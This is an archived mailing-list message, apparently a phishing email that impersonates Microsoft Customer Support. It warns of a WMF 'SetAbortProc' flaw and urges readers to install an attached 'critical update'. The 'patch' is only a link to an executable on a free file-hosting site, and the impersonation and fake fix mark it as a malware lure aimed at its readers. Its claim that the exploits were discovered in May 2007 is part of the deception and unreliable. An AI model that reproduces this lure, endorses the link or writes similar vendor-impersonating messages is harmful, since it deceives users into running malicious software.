[6242] in im locker bugs

home help back first fref pref prev next nref lref last post

Critical vulnerability

daemon@ATHENA.MIT.EDU (Microsoft Customer Support)
Mon May 28 15:10:11 2007

To: bug-im@mit.edu
From: Microsoft Customer Support <Support@Microsoft.com>
Reply-To: 
Date: Mon, 28 May 2007 15:09:49 -0400

Dear Microsoft Customers.

Greetings,
In program maintenance of Microsoft corporation, a critical vulnerability has been found in processing WMF-files.
Exploits using the "SetAbortProc" GDI function were discovered in May 2007.
The function, which registers an error handler normally intended for use when a print job is cancelled during spooling, allows arbitrary code added to a WMF image to be executed without the permission of the user.
Microsoft has released a critical update for Windows 98/2000/XP and Vista.
We urge you to update your Windows operating system with the patch attached, to prevent malicious users from compromising your systems security.
Our patch is attached onto email.
With best regards, the Microsoft Customer Support.

Attach: http://h1.ripway.com/daxter/wmf-patch-windows32.exe




home help back first fref pref prev next nref lref last post